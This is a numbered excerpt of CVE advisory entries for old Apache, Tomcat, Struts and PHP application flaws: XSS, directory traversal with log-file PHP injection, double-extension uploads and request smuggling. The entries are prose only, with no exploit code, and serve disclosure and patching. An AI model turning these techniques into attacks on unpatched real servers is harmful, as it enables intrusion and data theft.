5856| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
5857| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
5858| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
5859| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
5860| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
5861| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
5862| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
5863| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
5864| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
5865| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
5866| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
5867| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
5868| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
5869| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
5870| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
5871| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
5872| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
5873| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
5874| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5875| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
5876| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
5877| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
5878| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
5879| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5880| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
5881| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
5882| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
5883| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
5884| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
5885| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
5886| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
5887| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
5888| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
5889| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
5890| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
5891| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
5892| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
5893| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5894| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5895| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
5896| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
5897| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
5898| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
5899| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
5900| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
5901| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
5902| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5903| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
5904| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5905| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
5906| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
5907| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
5908| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5909| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
5910| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5911| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
5912| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
5913| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5914| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
5915| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
5916| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
5917| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
5918| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
5919| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
5920| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
5921| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
5922| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5923| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
5924| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
5925| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
5926| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
5927| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
5928| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
5929| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
5930| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
5931| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
5932| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
5933| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
5934| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
5935| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
5936| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
5937| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
5938| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
5939| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
5940| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
5941| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
5942| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
5943| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
5944| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5945| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5946| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
5947| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
5948| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
5949| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
5950| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
5951| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
5952| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
5953| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
5954| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
5955| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
5956| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
5957| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
5958| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
5959| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
5960| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
5961| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
5962| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
5963| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
5964| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
5965| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
5966| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
5967| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
5968| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
5969| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5970| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5971| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
